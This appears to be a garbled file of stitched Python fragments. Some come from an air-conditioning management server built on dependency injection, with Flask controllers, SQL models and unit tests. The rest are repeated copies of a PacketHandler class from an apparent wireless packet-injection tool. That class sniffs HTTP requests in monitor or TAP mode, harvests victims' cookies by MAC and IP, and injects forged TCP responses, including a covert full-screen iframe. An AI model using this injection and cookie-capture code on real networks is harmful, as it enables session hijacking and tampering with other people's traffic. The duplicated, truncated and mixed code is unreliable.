def __init__(self, *positional_parameters, **keyword_parameters):
self.victims = keyword_parameters.get('victims')
if self.victims is None:
self.victims = []
self.handler = keyword_parameters.get('handler')
self.i = keyword_parameters.get('i')
self.victim_parameters = keyword_parameters.get('victim_parameters')
if self.i is None:
print('[ERROR] No injection interface selected')
exit(1)
if len(self.victims) == 0 and self.victim_parameters is None:
print('[ERROR] Please specify victim parameters or Victim List')
exit(1)
## Argument handling
args = keyword_parameters.get('Args')
self.nic = args.mon
self.single = args.single
## Trigger setup
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newvictims = []
self.injector = Injector(self.i, args)
class ReportModelTest(unittest.TestCase):
def setUp(self) -> None:
self.inj = Injector()
self.db = sqlDatabase
self.db.connect(argv[1], int(argv[2]), argv[3], argv[4], argv[5])
self.inj.provide(SQLDatabase, self.db)
def insert_data(self):
r = Room(room_id='test')
rm = RoomModelImpl(self.inj)
rid = rm.insert(r.room_id, r.app_key)
sleep(1)
em = EventModelImpl(self.inj)
mm = MetricsModelImpl(self.inj)
sm = StatisticModelImpl(self.inj)
em.insert_connect_event(rid)
sleep(1)
em.insert_start_state_control_event(rid, 'high')
sleep(0.5)
mm.insert(rid, 'high', 24.0)
sleep(0.5)
sm.insert(rid, 2.0, 10.0)
sleep(0.5)
mm.insert(rid, 'high', 23.0)
sleep(0.5)
sm.insert(rid, 2.0, 10.0)
sm.insert(rid, 0.2, 1.0)
em.insert_stop_state_control_event(rid)
em.insert_disconnect_event(rid)
def __init__(self, injector: Injector):
super().__init__(injector)
self.apply_ctl(injector.require(PingController), master_http_spec.ping)
self.apply_ctl(injector.require(AdminController), master_http_spec.admin)
self.apply_ctl(injector.require(ConnectController), master_http_spec.connect)
self.apply_ctl(injector.require(MetricsController), master_http_spec.metrics)
self.apply_ctl(injector.require(StatisticsController), master_http_spec.statistics)
self.apply_ctl(injector.require(SlaveStateControlController), master_http_spec.slave_state_control)
def build_middleware(self, inj: Injector = None):
inj = inj or self.injector
# inj.build(ReceiveRequestMiddleware, ReceiveRequestMiddlewareImpl)
inj.build(AuthAdminMiddleware, AuthAdminMiddlewareImpl)
inj.build(AuthSlaveMiddleware, AuthSlaveMiddlewareImpl)
inj.build(BootMiddleware, BootMiddlewareImpl)
CORS(inj.require(Flask))
return inj
def __init__(self, inj: Injector):
self.rc = inj.require(RouteController) # type: RouteController
self.s = inj.require(ConnectionService) # type: ConnectionService
self.dc = inj.require(
DisConnectionService) # type: DisConnectionService
self.auth = inj.require(
AuthSlaveMiddleware) # type: AuthSlaveMiddleware
self.check_boot = inj.require(BootMiddleware) # type: BootMiddleware
class BasicSqlite3Test(unittest.TestCase):
def setUp(self) -> None:
self.db = SQLite3(memory=True)
self.injector = Injector()
self.injector.provide(SQLDatabase, self.db)
self.model = None
def tearDown(self) -> None:
del self.db
def assert_create_table(self):
self.assertTrue(self.model.create(), self.db.last_error_lazy)
def __init__(self, **kwargs):
self.i = kwargs.get('i')
self.tParams = kwargs.get('tParams')
args = kwargs.get('Args')
self.nic = args.mon
# self.single = args.single
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newTgts = []
self.injector = Injector(self.i, args)
def __init__(self, inj: Injector):
self.user_model = inj.require(UserModel) # type: UserModel
self.room_model = inj.require(RoomModel) # type: RoomModel
self.user_in_room_model = inj.require(UserInRoomRelationshipModel) # type: UserInRoomRelationshipModel
self.event_model = inj.require(EventModel) # type: EventModel
self.cfg_provider = inj.require(ConfigurationProvider) # type: ConfigurationProvider
self.master_air_cond = inj.require(MasterAirCond) # type: MasterAirCond
self.connection_pool = inj.require(ConnectionPool) # type: ConnectionPool
self.password_verifier = inj.require(PasswordVerifier) # type: PasswordVerifier
self.jwt = inj.require(JWT) # type: JWT
self.random_source = inj.require(SystemEntropyProvider) # type: SystemEntropyProvider
self.expire_time = datetime.timedelta(hours=1)
def create_table(self, inj: Injector = None):
inj = inj or self.injector
for model_prototype in [UserModel, RoomModel, UserInRoomRelationshipModel, MetricModel, StatisticModel,
EventModel]:
model_instance = inj.require(model_prototype)
created = model_instance.create()
if not created:
self.logger.fatal('create table failed', args={'model_type': str(model_prototype)})
def __init__(self, *positional_parameters, **keyword_parameters):
if 'victims' in keyword_parameters:
self.victims = keyword_parameters['victims']
else:
self.victims = []
if 'excluded' in keyword_parameters:
self.excluded = self.proc_excluded(keyword_parameters['excluded'])
else:
self.excluded = None
if 'handler' in keyword_parameters:
self.handler = keyword_parameters['handler']
else:
self.handler = None
if 'i' in keyword_parameters:
self.i = keyword_parameters['i']
else:
self.i = None
if 'victim_parameters' in keyword_parameters:
self.victim_parameters = keyword_parameters['victim_parameters']
else:
self.victim_parameters = None
if self.i is None:
print('[ERROR] No injection interface selected')
exit(1)
if len(self.victims) == 0 and self.victim_parameters is None:
print('[ERROR] Please specify victim parameters or Victim List')
exit(1)
## Argument handling
args = keyword_parameters['Args']
self.nic = args.mon
self.single = args.single
self.verbose = args.v
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newvictims = []
self.injector = Injector(self.i, args)
class MetricModelTest(unittest.TestCase):
def setUp(self) -> None:
self.inj = Injector()
self.inj.provide(SQLDatabase, BaseSQLDatabaseImpl())
self.db = self.inj.require(SQLDatabase)
self.db.connect(argv[1], int(argv[2]), argv[3], argv[4], argv[5])
def insert_data(self):
r = Room(room_id='metric_test')
rm = RoomModelImpl(self.inj)
rid = rm.insert(r.room_id, r.app_key)
r2 = Room(room_id='metric_test2')
r2id = rm.insert(r2.room_id, r2.app_key)
sleep(1)
em = EventModelImpl(self.inj)
mm = MetricsModelImpl(self.inj)
sm = StatisticModelImpl(self.inj)
em.insert_connect_event(rid)
sleep(1)
em.insert_start_state_control_event(rid, 'high')
sleep(0.5)
mm.insert(rid, 'high', 24.0)
sleep(0.5)
sm.insert(rid, 2.0, 10.0)
em.insert_start_state_control_event(r2id, 'low')
sleep(0.5)
mm.insert(rid, 'high', 23.0)
sm.insert(r2id, 1.0, 5.0)
sleep(0.5)
sm.insert(rid, 2.0, 10.0)
mm.insert(r2id, 'low', 24.0)
sm.insert(rid, 0.2, 1.0)
em.insert_stop_state_control_event(rid)
sleep(0.5)
mm.insert(r2id, 'low', 23.0)
sleep(0.5)
em.insert_disconnect_event(rid)
sm.insert(r2id, 1.0, 5.0)
sleep(0.5)
mm.insert(r2id, 'low', 22.0)
sm.insert(r2id, 0.5, 2.5)
em.insert_stop_state_control_event(r2id)
sleep(1)
em.insert_disconnect_event(r2id)
def expose_service(self, inj: Injector = None):
inj = inj or self.injector
opt = inj.require(OptionProvider) # type: OptionProvider
MasterFlaskRouter(inj)
# .run(host=opt.find('host'), port=opt.find('port'))
self.websocket_conn.sio.run(self.websocket_conn.app, host=opt.find('host'), port=int(opt.find('port')),
debug=True)
def __init__(self, inj: Injector = None, cfg: ServerBuilderConfiguration = None, use_test_database: bool = None):
self.injector = inj or Injector()
self.cfg = cfg or ServerBuilderConfiguration()
if use_test_database is not None:
self.cfg.use_test_database = use_test_database
self.logger = None
self.db_conn = None
self.websocket_conn = None
self.connection_pool = None # type: Union[MemoryConnectionPoolImpl, None]
def inject_service(inj: Injector):
inj.build(AdminLoginService, AdminLoginServiceImpl)
inj.build(AdminBootMasterDaemonService, AdminBootMasterDaemonServiceImpl)
inj.build(AdminShutdownMasterDaemonService,
AdminShutdownMasterDaemonServiceImpl)
return inj
def __init__(self, inj: Injector):
self.master_air_cond = inj.require(MasterAirCond) # type: MasterAirCond
self.uuid_provider = inj.require(UUIDGenerator) # type: UUIDGenerator
self.dispatcher = inj.require(Dispatcher) # type: Dispatcher
self.event_model = inj.require(EventModel) # type: EventModel
self.dispatcher.on_pop(self._pop_request)
self.dispatcher.on_fallback(self._fallback_request)
self.connection_pool = inj.require(ConnectionPool) # type: ConnectionPool
self.logger = inj.require(Logger) # type: Logger
self.statistic_model = inj.require(StatisticModel) # type: StatisticModel
self.base_time = time.perf_counter()
def boot_server(self, inj: Injector = None):
inj = inj or self.injector
dispatcher = inj.require(Dispatcher) # type: Dispatcher
dispatcher.boot_up()
self.connection_pool.boot_up()
self.create_table(inj)
if self.cfg.use_test_database:
um = inj.require(UserModel) # type: UserModel
uim = inj.require(UserInRoomRelationshipModel) # type: UserInRoomRelationshipModel
rm = inj.require(RoomModel) # type: RoomModel
mm = inj.require(MetricModel) # type: MetricModel
em = inj.require(EventModel) # type: EventModel
sm = inj.require(StatisticModel) # type: StatisticModel
pw = inj.require(PasswordVerifier) # type: PasswordVerifier
rid = rm.insert('A-101', pw.create('1234'))
rm.insert('A-102', pw.create('1234'))
uid = um.insert('xxx')
uim.insert(user_id=uid, room_id=rid)
# mm.insert('A-101', '1234')
# mm.insert('A-102', '1234')r = Room(room_id='metric_test')
r = Room(room_id='metric_test')
rid = rm.insert(r.room_id, r.app_key)
r2 = Room(room_id='metric_test2')
r2id = rid = rm.insert(r2.room_id, r2.app_key)
em.insert_connect_event(rid)
em.insert_start_state_control_event(rid, 'high')
mm.insert(rid, 'high', 24.0)
sm.insert(rid, 2.0, 10.0)
em.insert_start_state_control_event(r2id, 'low')
mm.insert(rid, 'high', 23.0)
sm.insert(r2id, 1.0, 5.0)
sm.insert(rid, 2.0, 10.0)
mm.insert(r2id, 'low', 24.0)
sm.insert(rid, 0.2, 1.0)
em.insert_stop_state_control_event(rid)
mm.insert(r2id, 'low', 23.0)
em.insert_disconnect_event(rid)
sm.insert(r2id, 1.0, 5.0)
mm.insert(r2id, 'low', 22.0)
sm.insert(r2id, 0.5, 2.5)
em.insert_stop_state_control_event(r2id)
em.insert_disconnect_event(r2id)
return inj
def __init__(self, injector: Injector):
self.option_context = injector.require(OptionContext) # type: OptionContext
self.parser = argparse.ArgumentParser(
description=self.option_context.description)
for option_argument in self.option_context.arguments:
option_string = []
if option_argument.long_opt:
option_string.append('--' + option_argument.long_opt)
if option_argument.short_opt:
option_string.append('-' + option_argument.short_opt)
self.parser.add_argument(
*option_string,
default=option_argument.default_value,
help=option_argument.help_msg)
self.namespace = self.parser.parse_args(self.option_context.option_args)
def __init__(self, injector: Injector):
self.opt = injector.require(OptionProvider) # type: OptionProvider
self.file_path = self.opt.find('config')
if self.file_path:
with open(self.file_path) as f:
ext = os.path.splitext(self.file_path)[1]
if ext == '.yaml' or ext == '.yml' or ext == '':
yaml = load_yaml_module()
self.config = load_configuration_from_dict(
yaml.load(f, yaml.SafeLoader))
else:
raise ValueError(
f'configuration file with unknown ext: path {self.file_path}, ext {ext}'
)
else:
self.config = Configuration()
def __init__(self, *positional_parameters, **keyword_parameters):
if 'victims' in keyword_parameters:
self.victims = keyword_parameters['victims']
else:
self.victims = []
if 'excluded' in keyword_parameters:
self.excluded = self.proc_excluded(keyword_parameters['excluded'])
else:
self.excluded = None
if 'handler' in keyword_parameters:
self.handler = keyword_parameters['handler']
else:
self.handler = None
if 'i' in keyword_parameters:
self.i = keyword_parameters['i']
else:
self.i = None
if 'victim_parameters' in keyword_parameters:
self.victim_parameters = keyword_parameters['victim_parameters']
else:
self.victim_parameters = None
if self.i is None:
print "[ERROR] No injection interface selected"
exit(1)
if len(self.victims) == 0 and self.victim_parameters is None:
print "[ERROR] Please specify victim parameters or Victim List"
exit(1)
## Argument handling
args = keyword_parameters['Args']
self.nic = args.mon
self.single = args.single
self.verbose = args.v
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newvictims = []
self.injector = Injector(self.i, args)
def setUp(self) -> None:
self.inj = Injector()
self.inj.provide(SQLDatabase, BaseSQLDatabaseImpl())
self.db = self.inj.require(SQLDatabase)
self.db.connect(argv[1], int(argv[2]), argv[3], argv[4], argv[5])
class PacketHandler(object):
"""This class does all the heavy-lifting.
It has an optional Victims parameter that is a
List of instances of Victims for targeted mode.
It can also be fed an instance of VictimParameters
directly if working in broadcast mode and attacking all clients.
"""
def __init__(self, *positional_parameters, **keyword_parameters):
if 'victims' in keyword_parameters:
self.victims = keyword_parameters['victims']
else:
self.victims = []
if 'excluded' in keyword_parameters:
self.excluded = self.proc_excluded(keyword_parameters['excluded'])
else:
self.excluded = None
if 'handler' in keyword_parameters:
self.handler = keyword_parameters['handler']
else:
self.handler = None
if 'i' in keyword_parameters:
self.i = keyword_parameters['i']
else:
self.i = None
if 'victim_parameters' in keyword_parameters:
self.victim_parameters = keyword_parameters['victim_parameters']
else:
self.victim_parameters = None
if self.i is None:
print('[ERROR] No injection interface selected')
exit(1)
if len(self.victims) == 0 and self.victim_parameters is None:
print('[ERROR] Please specify victim parameters or Victim List')
exit(1)
## Argument handling
args = keyword_parameters['Args']
self.nic = args.mon
self.single = args.single
self.verbose = args.v
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newvictims = []
self.injector = Injector(self.i, args)
#print 'packet_handler has instantiated Injector()'
### Trace out args for victim.add_cookie
def cookieManager(self, vicmac, vicip, cookie, args):
"""This function does cookie management for broadcast mode and targeted mode.
A new mode is also added that can work in both broadcast
added that if VictimParameters is set, it also performs a broadcast attack.
"""
### Need to comment this up...
if len(self.victims) == 0:
try:
k = cookie[1]
except:
cookie = ["NONE", "NONE"]
if cookie[1] is not None:
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 1
if exists == 0:
v1 = Victim(ip=vicip,
mac=vicmac,
victim_parameters=self.victim_parameters)
v1.add_cookie(cookie, args)
self.newvictims.append(v1)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], "NONE"]
cookie = newcookie
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
exists = 1
if exists == 0:
v1 = Victim(ip=vicip,
mac=vicmac,
victim_parameters=self.victim_parameters)
self.newvictims.append(v1)
else:
vic_in_targets = 0
try:
k = cookie[1]
except:
try:
k = cookie[0]
cookie[1] = 'NONE'
except:
cookie = ['NONE', 'NONE']
if cookie[1] is not None:
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], 'NONE']
cookie = newcookie
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
vic_in_targets = 1
## IF VIC IS IN TARGETS, RETURN
if vic_in_targets == 1:
return
if self.victim_parameters is not None:
try:
k = cookie[1]
except:
#print cookie
cookie = ['NONE', 'NONE']
if cookie[1] is not None:
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 1
if exists == 0:
v1 = Victim(ip=vicip,
mac=vicmac,
victim_parameters=self.victim_parameters)
v1.add_cookie(cookie, args)
self.newvictims.append(v1)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], 'NONE']
cookie = newcookie
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
exists = 1
if exists == 0:
v1 = Victim(ip=vicip,
mac=vicmac,
victim_parameters=self.victim_parameters)
self.newvictims.append(v1)
def cookieSearch(self, ret2):
"""Looks for cookie in string returned by PacketHandler.requestExtractor().
Returns a List object [host, cookie] if there is one, otherwise returns None.
"""
if len(ret2.strip()) > 0:
arr = ret2.split('\n')
#print ret2
host = ""
cookie = ""
for line in arr:
if 'Cookie' in line:
cookie = line.strip()
if 'Host' in line:
host = line.split()[1].strip()
if len(host) != 0 and len(cookie) != 0:
return [host, cookie]
else:
if len(host) > 0:
return (host, None)
else:
return None
else:
return None
### Need docstring
def covert_injection(self, svrip, seqnum, request, injection):
global BLOCK_HOSTS
#print svrip,BLOCK_HOSTS
for obj in BLOCK_HOSTS:
ip, seq = obj
if svrip == ip:
return 0
BLOCK_HOSTS.add((svrip, seqnum))
#print BLOCK_HOSTS
req = request.split('\n')
filename = ''
host = ''
for line in req:
if 'GET' in line:
filename = line.split()[1].strip()
if 'Host' in line:
host = line.split()[1].strip()
if len(host) > 0 and len(filename) > 0:
injection += """ <body style="margin:0px;padding:0px;overflow:hidden">"""
injection += """ <iframe src=" """
if host in filename:
injection += 'http://' + filename[1:]
else:
injection += 'http://' + host + filename
injection += """ " frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe> """
injection += '</body>'
#print injection
return injection
def condensor(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, request, cookie, TSVal, TSecr, args,
injection, victim):
"""Condense some of the logic into a single function"""
if victim.victim_parameters.covert:
cov_injection = self.covert_injection(svrip, seqnum, request,
injection)
if cov_injection != 0:
injection = cov_injection
else:
return 0
print('DEBUG injection print')
print(injection)
self.injector.inject(vicmac, rtrmac, dstmac, vicip, svrip, vicport,
svrport, acknum, seqnum, injection, TSVal, TSecr)
#print 'sent'
def proc_excluded(self, excluded):
"""Check if argument provided in excluded is an ip.
If it's not, dns resolve it and add those IPs to the exclude list.
"""
processed = set()
for item in excluded:
try:
test = item.split('.')
if len(test) != 4:
try:
processed.add(socket.gethostbyname(item))
except:
pass
### This logic can be cleaner/faster
### regex -or- (mac check, then assume if try fails, it must be ip)
else:
#print test
try:
if int(test[0]) > 0 and int(test[0]) < 256:
if int(test[1]) > 0 and int(test[1]) < 256:
if int(test[2]) > 0 and int(test[2]) < 256:
if int(test[3]) > 0 and int(test[3]) < 256:
processed.add(item)
except:
processed.add(socket.gethostbyname(item))
except:
try:
processed.add(socket.gethostbyname(item))
except:
pass
return processed
def proc_handler(self, packet, args):
"""Process handler responsible for the last mile of packet filtering
Obtains packet specific information and stores it to memory
"""
if packet.haslayer(IP) and packet.haslayer(TCP):
## Trigger check
request = self.requestExtractor(packet)
if self.trigger in request:
## MONITOR MODE
if self.nic == 'mon':
rtrmac = packet.getlayer(Dot11).addr1
vicmac = packet.getlayer(Dot11).addr2
dstmac = packet.getlayer(Dot11).addr3
## TAP MODE
else:
rtrmac = packet.getlayer(Ether).dst
vicmac = packet.getlayer(Ether).src
dstmac = 'TAP'
vicip = packet.getlayer(IP).src
svrip = packet.getlayer(IP).dst
vicport = packet.getlayer(TCP).sport
svrport = packet.getlayer(TCP).dport
size = len(packet.getlayer(TCP).load)
acknum = str(int(packet.getlayer(TCP).seq) + size)
seqnum = packet.getlayer(TCP).ack
global BLOCK_HOSTS
for obj in BLOCK_HOSTS:
ip, seq = obj
if svrip == ip and seqnum != seq:
print("REMOVING {0}".format(svrip))
for obj2 in BLOCK_HOSTS:
ip2, seq2 = obj2
if ip2 == svrip:
BLOCK_HOSTS.remove((ip2, seq2))
if args.pcap:
wrpcap('inbound.pcap', packet)
else:
return 0
#print BLOCK_HOSTS
try:
TSVal, TSecr = packet.getlayer(TCP).options[2][1]
except:
TSVal = None
TSecr = None
cookie = self.cookieSearch(request)
#print (vicmac, rtrmac, vicip, svrip, vicport, svrport, acknum, seqnum, request, cookie, TSVal, TSecr)
return (vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, request, cookie, TSVal, TSecr)
return None
def proc_injection(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport,
svrport, acknum, seqnum, request, cookie, TSVal, TSecr,
args):
"""Process injection function using the PacketHandler.victims List.
If it was set, to check if the packet belongs to any of the targets.
If no victims List is set, meaning it's in broadcast mode, it checks
for the victim in PacketHandler.newvictims and gets the injection for it,
if there is one, and injects it via Injector.inject().
"""
if len(self.victims) == 0:
if self.victim_parameters.in_request is not None:
result = self.victim_parameters.proc_in_request(request)
#print result
if (not result):
return 0
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac, vicip,
svrip, vicport, svrport, acknum,
seqnum, request, cookie, TSVal,
TSecr, args, injection, victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac, vicip,
svrip, vicport, svrport, acknum,
seqnum, request, cookie, TSVal,
TSecr, args, injection, victim)
else:
if self.victim_parameters is not None:
if self.victim_parameters.in_request is not None:
result = self.victim_parameters.proc_in_request(request)
#print result
if not result:
return 0
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac, vicip,
svrip, vicport, svrport, acknum,
seqnum, request, cookie, TSVal,
TSecr, args, injection, victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac,
vicip, svrip, vicport,
svrport, acknum, seqnum,
request, cookie, TSVal,
TSecr, args, injection,
victim)
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
if victim.victim_parameters.in_request is not None:
result = victim.victim_parameters.proc_in_request(
request)
if not result:
return 0
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac, vicip,
svrip, vicport, svrport, acknum,
seqnum, request, cookie, TSVal,
TSecr, args, injection, victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
if victim.victim_parameters.in_request is not None:
result = victim.victim_parameters.proc_in_request(
request)
if not result:
return 0
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac, rtrmac, dstmac, vicip,
svrip, vicport, svrport, acknum,
seqnum, request, cookie, TSVal,
TSecr, args, injection, victim)
def process(self, interface, pkt, args):
"""Process packets coming from the sniffer.
You can override the handler with one of your own,
that you can use for any other packet type (e.g DNS),
otherwise it uses the default packet handler looking
for GET requests for injection and cookies.
"""
## You can write your own handler for packets
## If wanted, do something like:
#if self.handler is not None:
#self.handler(interface, pkt, args)
#else:
try:
vicmac,\
rtrmac,\
dstmac,\
vicip,\
svrip,\
vicport,\
svrport,\
acknum,\
seqnum,\
request,\
cookie,\
TSVal,\
TSecr = self.proc_handler(pkt, args)
self.cookieManager(vicmac, vicip, cookie, args)
print('BREAK IS HERE')
self.proc_injection(vicmac, rtrmac, dstmac, vicip, svrip, vicport,
svrport, acknum, seqnum, request, cookie,
TSVal, TSecr, args)
except:
return
def requestExtractor(self, pkt):
"""Extracts the payload for trigger processing"""
ret2 = "\n".join(pkt.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n"))
if len(ret2.strip()) > 0:
return ret2.translate(None, "'").strip()
else:
return None
def expose_service(inj: Injector):
opt = inj.require(OptionProvider) # type: OptionProvider
DaemonFlaskRouter(inj).run(opt.find('host'), opt.find('port'))
def inject_controller(inj: Injector):
inj.build(PingController, PingControllerFlaskImpl)
inj.build(DaemonAdminController, FlaskDaemonAdminControllerImpl)
return inj
class PacketHandler(object):
"""This class does all the heavy-lifting.
It has an optional Victims parameter that is a
List of instances of Victims for targeted mode.
It can also be fed an instance of VictimParameters
directly if working in broadcast mode and attacking all clients.
"""
def __init__(self, *positional_parameters, **keyword_parameters):
if 'victims' in keyword_parameters:
self.victims = keyword_parameters['victims']
else:
self.victims = []
if 'excluded' in keyword_parameters:
self.excluded = self.proc_excluded(keyword_parameters['excluded'])
else:
self.excluded = None
if 'handler' in keyword_parameters:
self.handler = keyword_parameters['handler']
else:
self.handler = None
if 'i' in keyword_parameters:
self.i = keyword_parameters['i']
else:
self.i = None
if 'victim_parameters' in keyword_parameters:
self.victim_parameters = keyword_parameters['victim_parameters']
else:
self.victim_parameters = None
if self.i is None:
print "[ERROR] No injection interface selected"
exit(1)
if len(self.victims) == 0 and self.victim_parameters is None:
print "[ERROR] Please specify victim parameters or Victim List"
exit(1)
## Argument handling
args = keyword_parameters['Args']
self.nic = args.mon
self.single = args.single
self.verbose = args.v
if args.trigger is None:
self.trigger = 'GET /'
else:
self.trigger = args.trigger
self.newvictims = []
self.injector = Injector(self.i, args)
#print 'packet_handler has instantiated Injector()'
### Trace out args for victim.add_cookie
def cookieManager(self,
vicmac,
vicip,
cookie,
args):
"""This function does cookie management for broadcast mode and targeted mode.
A new mode is also added that can work in both broadcast
added that if VictimParameters is set, it also performs a broadcast attack.
"""
### Need to comment this up...
if len(self.victims) == 0:
try:
k = cookie[1]
except:
cookie = ["NONE", "NONE"]
if cookie[1] is not None:
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 1
if exists == 0:
v1 = Victim(ip = vicip,
mac = vicmac,
victim_parameters = self.victim_parameters)
v1.add_cookie(cookie, args)
self.newvictims.append(v1)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], "NONE"]
cookie = newcookie
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
exists = 1
if exists == 0:
v1 = Victim(ip = vicip,
mac = vicmac,
victim_parameters = self.victim_parameters)
self.newvictims.append(v1)
else:
vic_in_targets = 0
try:
k = cookie[1]
except:
try:
k = cookie[0]
cookie[1] = 'NONE'
except:
cookie = ['NONE', 'NONE']
if cookie[1] is not None:
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], 'NONE']
cookie = newcookie
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
vic_in_targets = 1
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
vic_in_targets = 1
## IF VIC IS IN TARGETS, RETURN
if vic_in_targets == 1:
return
if self.victim_parameters is not None:
try:
k = cookie[1]
except:
#print cookie
cookie = ['NONE', 'NONE']
if cookie[1] is not None:
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 1
if exists == 0:
v1 = Victim(ip = vicip,
mac = vicmac,
victim_parameters = self.victim_parameters)
v1.add_cookie(cookie, args)
self.newvictims.append(v1)
else:
if cookie[0] is not None and cookie[1] is None:
newcookie = [cookie[0], 'NONE']
cookie = newcookie
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
victim.add_cookie(cookie, args)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
victim.add_cookie(cookie, args)
exists = 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
exists = 1
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
exists = 1
if exists == 0:
v1 = Victim(ip = vicip,
mac = vicmac,
victim_parameters = self.victim_parameters)
self.newvictims.append(v1)
def cookieSearch(self, ret2):
"""Looks for cookie in string returned by PacketHandler.requestExtractor().
Returns a List object [host, cookie] if there is one, otherwise returns None.
"""
if len(ret2.strip()) > 0:
arr = ret2.split('\n')
#print ret2
host = ""
cookie = ""
for line in arr:
if 'Cookie' in line:
cookie = line.strip()
if 'Host' in line:
host = line.split()[1].strip()
if len(host) != 0 and len(cookie) != 0:
return [host, cookie]
else:
if len(host) > 0:
return (host, None)
else:
return None
else:
return None
### Need docstring
def covert_injection(self,
svrip,
seqnum,
request,
injection):
global BLOCK_HOSTS
#print svrip,BLOCK_HOSTS
for obj in BLOCK_HOSTS:
ip, seq = obj
if svrip == ip:
return 0
BLOCK_HOSTS.add((svrip, seqnum))
#print BLOCK_HOSTS
req = request.split('\n')
filename = ''
host = ''
for line in req:
if 'GET' in line:
filename = line.split()[1].strip()
if 'Host' in line:
host = line.split()[1].strip()
if len(host) > 0 and len(filename) > 0:
injection += """ <body style="margin:0px;padding:0px;overflow:hidden">"""
injection += """ <iframe src=" """
if host in filename:
injection += 'http://' + filename[1:]
else:
injection += 'http://' + host + filename
injection += """ " frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe> """
